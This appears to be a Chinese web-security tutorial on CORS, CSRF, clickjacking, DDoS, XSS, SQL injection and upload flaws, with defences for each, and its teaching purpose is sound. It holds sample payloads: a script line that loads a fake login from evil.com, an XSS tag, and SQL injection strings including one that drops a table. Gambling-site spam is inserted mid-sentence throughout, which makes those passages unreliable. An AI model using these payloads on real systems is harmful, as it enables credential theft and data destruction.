WEB攻击的数量逐年上升,占了大部分攻击事件比例。Web安全已经推到了前沿浪尖,12bet,无论是政府还是企业都迫切解决这个棘手的问题,Gartner 统计:目前75%攻击转移到应用层。12博体育,原有的传统防御设备已经不能满足企业对网络攻击的防御。WEB应用技术在积极发展的同时需要强有力的安全保障,所以 WAF是应形势需求诞生的产品,12bet,走上应用安全的舞台,是一个必然的趋势。
本文将介绍几种常见的Web攻击及其防护方法。
1.CORS
跨域资源共享(Cross-origin resource sharing),12bet,定义了一种浏览器和服务器交互的方式来确定是否允许跨域请求。12博体育,是一个妥协,有更大的灵活性,但比起简单地允许所有这些的要求来说更加安全。简言之,CORS就是为了让AJAX可以实现可控的跨域访问而生的。
服务器端对于CORS的支持,主要就是通过设置Access-Control-Allow-Origin来进行的。12bet,如果浏览器检测到相应的设置,就可以允许Ajax进行跨域的访问。例如:
Access–Control-Allow-Origin: https://blog.liuwanlin.info
1.1.风险
1、HTTP头只能说明请求来自一个特定的域,但是并不能保证这个事实。因为HTTP头可以被伪造。
2、第三方有可能被入侵
举一个场景,FriendFeed通过跨域请求访问Twitter,FriendFeed请求tweets、提交tweets并且执行一些用户操作,Twitter提供响应。两者都互相相信对方,所以FriendFeed并不验证获取数据的有效性,Twitter也针对Twitter开放了大部分的功能。
但是当如果Twitter被入侵后:
FriendFeed总是从Twitter获取数据,没有经过编码或者验证就在页面上显示这些信息。但是Twitter被入侵后,这些数据就可能是有害的。
或者FriendFeed被入侵时:
Twitter响应FriendFeed的请求,例如发表Tweets、更换用户名甚至删除账户。当FriendFeed被入侵后,攻击者可以利用这些请求来篡改用户数据。
所以对于请求方来说验证接收的数据有效性和服务方仅暴露最少最必须的功能是非常重要的。
3、恶意跨域请求
即便页面只允许来自某个信任网站的请求,但是它也会收到大量来自其他域的跨域请求。.这些请求有时可能会被用于执行应用层面的DDOS攻击,并不应该被应用来处理。
例如,考虑一个搜索页面。当通过’%’参数请求时搜索服务器会返回所有的记录,这可能是一个计算繁重的要求。要击垮这个网站,攻击者可以利用XSS漏洞将Javascript脚本注入某个公共论坛中,当用户访问这个论坛时,使用它的浏览器重复执行这个到服务器的搜索请求。或者即使不采用跨域请求,使用一个目标地址包含请求参数的图像元素也可以达到同样的目的。如果可能的话,攻击者甚至可以创建一个WebWorker执行这种攻击。这会消耗服务器大量的资源。
有效的解决办法是通过多种条件屏蔽掉非法的请求,例如HTTP头、参数等。
4、内部信息泄漏
假定一个内部站点开启了CORS,如果内部网络的用户访问了恶意网站,恶意网站可以通过COR(跨域请求)来获取到内部站点的内容。
5、针对用户的攻击
上面都是针对服务器的攻击,风险5则针对用户。比方说,攻击者已经确定了你可以全域访问的productsearch.php页面上存在SQL注入漏洞。 攻击者并不是直接从它们的系统数据库中获取数据,他们可能会编写一个JavaScript数据采集脚本,并在自己的网站或者存在XSS问题的网站上插入这段脚本。当受害者访问含有这种恶意JavaScript脚本的网站时,它的浏览器将执行针对“productsearch.php”的SQL注入攻击,采集所有的数据并发送给攻击者。检查服务器日志显示是受害人执行了攻击,因为除了来自Referrer的HTTP头一般没有其他日志记录。受害者并不能说他的系统被攻破,因为没有任何任何恶意软件或系统泄漏的痕迹。
2.CSRF
跨站请求伪造(Cross-Site Request Forgery)
2.1.原理
从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:
1.登录受信任网站A,并在本地生成Cookie。
2.在不登出A的情况下,访问危险网站B。
看到这里,你也许会说:“如果我不满足以上两个条件中的一个,我就不会受到CSRF的攻击”。是的,确实如此,但你不能保证以下情况不会发生:
1.你不能保证你登录了一个网站后,不再打开一个tab页面并访问另外的网站。
2.你不能保证你关闭浏览器了后,你本地的Cookie立刻过期,你上次的会话已经结束。(事实上,关闭浏览器不能结束一个会话,但大多数人都会错误的认为关闭浏览器就等于退出登录/结束会话了……)
3.上图中所谓的攻击网站,可能是一个存在其他漏洞的可信任的经常被人访问的网站。
2.2.防护
- 将cookie设置未HttpOnly
Set-Cookie:cookiename=value;HttpOnly
- 增加token
表单中增加一个隐藏域,提交时将隐藏域提交,服务端验证token。 - 通过referer识别
根据Http协议,在HTTP头中有一个字段交Referer,它记录了HTTP请求的来源地址。如果攻击者要实施csrf攻击时,必须从其他站点伪造请求,当用户通过其他网站发送请求时,请求的Referer的值是其他网站的网址。因此可以对每个请求验证其Referer值即可。
3.劫持攻击
3.1.点击劫持
被攻击的页面作为iframe,用Mask的方式设置为透明放在上层,恶意代码偷偷地放在后面的页面中,使得一个页面看起来似乎是安全的,然后诱骗用户点击网页上的内容,达到窃取用户信息或者劫持用户操作的目的。下图中,欺诈的页面放置在下层,被攻击的银行页面作为透明的层放置在上层,用户看到的是欺诈页面上显示的信息并进行输入和点击,但是真正的用户行为是发生在银行页面上的。
3.2.Cookie劫持
ClickJacking只涉及点击操作,但是HTML5的拖放API使得这种攻击扩大到拖放操作。因为现在Web应用里,有大量需要用户拖放完成的操作。在同源策略里,一个域的Cookie只能被本域所访问,但是拖放操作是不受同源策略限制的,这样利用拖放操作、XSS和其他技巧,可以构造跨域合法请求,劫持Cookie。
实现原理其实和ClickJacking类似,只要欺骗用户进行拖放行为,就可以把用户某个域的信息发送到另外一个域里。这个其实很容易做到,之前有一个研究者就在Facebook上建立了一个应用,这个应用的功能是让用户把图片上美女的衣服拖拽下来。我想可能大多数人都会去尝试而且不会有警惕心理。
3.3.跨域资源劫持
HTML5应用有各种不同的资源,例如Flash文件,Silverligh,视频,音频等,这些资源可以通过DOM访问和控制。如果页面存在XSS漏洞,那么攻击者可能通过跨域资源的劫持进行攻击。例如下面的代码载入了一个swf文件,作为用户登录框,这里面我们可以实现一些加密的逻辑。
<object classid=“clsid:xxxxxxx-xxxx-xxxx-xxxxxx” id=“Login” width=“100%”height=“100%” codebase=https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab>
<param name=“movie”value=“Login.swf” />
<param name=“quality”value=“high” />
<embed src=“Login.swf”quality=“high” width=“50%” height=“50%”>
</object>
当页面存在XSS漏洞时,攻击者可以利用如下脚本把swf文件替换为欺诈的虚假资源。
document.getElementByName('Login').item(0).src='https://evil.com/login.swf';
那么当用户在这样的登录框里输入自己的用户名和密码并登录时,他的帐号就已经被盗取了。
4.DDOS
分布式拒绝服务攻击(Distributed Denial of service),是目前最为强大、最难防御的攻击方式之一。
按照发起的方式,DDoS可以简单分为三类。
第一类以力取胜,海量数据包从互联网的各个角落蜂拥而来,堵塞IDC入口,让各种强大的硬件防御系统、快速高效的应急流程无用武之地。这种类型的攻击典型代表是ICMP Flood和UDP Flood,现在已不常见。
第二类以巧取胜,灵动而难以察觉,每隔几分钟发一个包甚至只需要一个包,就可以让豪华配置的服务器不再响应。这类攻击主要是利用协议或者软件的漏洞发起,例如Slowloris攻击、Hash冲突攻击等,需要特定环境机缘巧合下才能出现。
第三类是上述两种的混合,轻灵浑厚兼而有之,既利用了协议、系统的缺陷,又具备了海量的流量,例如SYN Flood攻击、DNS Query Flood攻击,是当前的主流攻击方式。
下面重点介绍几种常见的ddos攻击:
4.1.SYN Flood
这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。
TCP协议为了实现可靠传输,在三次握手的过程中设置了一些异常处理机制。第三步中如果服务器没有收到客户端的最终ACK确认报文,会一直处于SYN_RECV状态,将客户端IP加入等待列表,并重发第二步的SYN+ACK报文。重发一般进行3-5次,大约间隔30秒左右轮询一次等待列表重试所有客户端。另一方面,服务器在自己发出了SYN+ACK报文后,会预分配资源为即将建立的TCP连接储存信息做准备,这个资源在等待重试期间一直保留。更为重要的是,服务器资源有限,可以维护的SYN_RECV状态超过极限后就不再接受新的SYN报文,也就是拒绝新的TCP连接建立。
4.2.DNS Query Flood
作为互联网最基础、最核心的服务,DNS自然也是DDoS攻击的重要目标之一。打垮DNS服务能够间接打垮一家公司的全部业务,或者打垮一个地区的网络服务。前些时候风头正盛的黑客组织anonymous也曾经宣布要攻击全球互联网的13台根DNS服务器,不过最终没有得手。
UDP攻击是最容易发起海量流量的攻击手段,而且源IP随机伪造难以追查。但过滤比较容易,因为大多数IP并不提供UDP服务,直接丢弃UDP流量即可。所以现在纯粹的UDP流量攻击比较少见了,取而代之的是UDP协议承载的DNS Query Flood攻击。简单地说,越上层协议上发动的DDoS攻击越难以防御,因为协议越上层,与业务关联越大,防御系统面临的情况越复杂。
DNS Query Flood就是攻击者操纵大量傀儡机器,对目标发起海量的域名查询请求。为了防止基于ACL的过滤,必须提高数据包的随机性。常用的做法是UDP层随机伪造源IP地址、随机伪造源端口等参数。在DNS协议层,随机伪造查询ID以及待解析域名。随机伪造待解析域名除了防止过滤外,还可以降低命中DNS缓存的可能性,尽可能多地消耗DNS服务器的CPU资源。
4.3.HTTP Flood
SYN Flood、DNS Query Flood在现阶段已经能做到有效防御了,真正令各大厂商以及互联网企业头疼的是HTTP Flood攻击。HTTP Flood是针对Web服务在第七层协议发起的攻击。它的巨大危害性主要表现在三个方面:发起方便、过滤困难、影响深远。
SYN Flood和DNS Query Flood都需要攻击者以root权限控制大批量的傀儡机。收集大量root权限的傀儡机很花费时间和精力,而且在攻击过程中傀儡机会由于流量异常被管理员发现,攻击者的资源快速损耗而补充缓慢,导致攻击强度明显降低而且不可长期持续。HTTP Flood攻击则不同,攻击者并不需要控制大批的傀儡机,取而代之的是通过端口扫描程序在互联网上寻找匿名的HTTP代理或者SOCKS代理,攻击者通过匿名代理对攻击目标发起HTTP请求。匿名代理是一种比较丰富的资源,花几天时间获取代理并不是难事,因此攻击容易发起而且可以长期高强度的持续。
另一方面,HTTP Flood攻击在HTTP层发起,极力模仿正常用户的网页请求行为,与网站业务紧密相关,安全厂商很难提供一套通用的且不影响用户体验的方案。在一个地方工作得很好的规则,换一个场景可能带来大量的误杀。
最后,HTTP Flood攻击会引起严重的连锁反应,不仅仅是直接导致被攻击的Web前端响应缓慢,还间接攻击到后端的Java等业务层逻辑以及更后端的数据库服务,增大它们的压力,甚至对日志存储服务器都带来影响。
有意思的是,HTTP Flood还有个颇有历史渊源的昵称叫做CC攻击。CC是Challenge Collapsar的缩写,而Collapsar是国内一家著名安全公司的DDoS防御设备。从目前的情况来看,不仅仅是Collapsar,所有的硬件防御设备都还在被挑战着,风险并未解除。
5.XSS
跨站脚本攻击(Cross Site Scripting)
5.1.原理
例如有一个表单输入框,名称为nick:
<input type="text", name="nick" value="xiaomao">
表单的nick来自于用户输入,如果用户输入”/>< script>alert(“haha”)< /script >
<input type="text", name="nick" value=""/>
<script>alert("haha")</script><!-">
在输入框后带上了一段脚本程序,这段脚本程序只是弹出一个消息框“haha”,并不会有什么危害,如果用户输入一段有危害的脚本,便会变得极具危害性。
5.2.防护
xss之所以会发生,是因为用户输入的数据变成了代码,因此需要对用户输入的数据进行html转义处理,将其中的“尖括号”,“单引号”,“双引号”之类的特殊字符进行转义编码。
如今许多框架默认就提供对html代码的转义,如jstl、struts等。
6.SQL注入
通过把sql命令伪装成正常的HTTP参数,传递到服务器,欺骗服务器最终执行恶意的sql命令,达到入侵的目的。
6.1.原理
假设登录网站的登录表单有昵称和密码两个字段,输入昵称和密码后,服务端进行验证,如果昵称和密码匹配,则显示登录,后端的查询验证为:
sql = "select * from user where nick = '" + nick + "'" + " and pwd = '"+pwd + "'"
如果用户输入昵称为zhang,并输入正确的密码,当然能够登录成功,但是如果用户输入的密码为' or '1'='1
,此时sql语句为:
select * from user where nick = '' and pwd = '' or '1'='1'
这样只要昵称正确,就可以成功登录了。
如果用户输入';drop table aaa;--
,这样sql语句变为:
select * from user where nick = '' and pwd = '';drop table aaa;--'
这样表aaa就被删除了。 当然还有更危险、复杂的攻击手段。
6.2.防护
- 使用预编译语句
例如如下句子,可以有效防止注入漏洞:select * from user where nick = ? and pwd = ?
- 使用ORM框架
- 密码加密
- 处理好异常
后台异常很可能包含一些如服务器版本、数据库版本、编程语言,甚至数据库的地址和用户名密码,攻击者可以按图索骥,找到漏洞进行攻击,因此必须处理好后台的系统异常,重定向到相应的错误处理页面,而不是任由其直接显示在页面上。
7.文件上传漏洞
在上网过程中,经常讲一些如图片、压缩包之类的文件上传到远端的服务器上进行保存。文件上传攻击指的是恶意攻击者利用一些站点没有对文件的类型做很好的校验,上传了可执行的文件或执行脚本,并且通过脚本获得服务器上相应的权利,或者通过诱导外部用户访问、下载上传的病毒或木马文件,达到攻击的目的。
因此需要对上传的文件进行校验,很多文件起始的几个字节是固定的,因此,根据这几个字节的内容,就可以判断文件的类型,这几个字节也被称作魔数
。
8.缓冲区溢出
缓冲区溢出,简单的说就是计算机对接收的输入数据没有进行有效的检测(理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符),向缓冲区内填充数据时超过了缓冲区本身的容量,而导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。
除了以上提到的一些攻击外,还有一些其他的攻击方式,这里就不再一一叙述,总之对于Web开发者开说,并不是写好代码就万事大吉,对于安全应该引起足够的重视,这样才能构建安全、健壮的应用。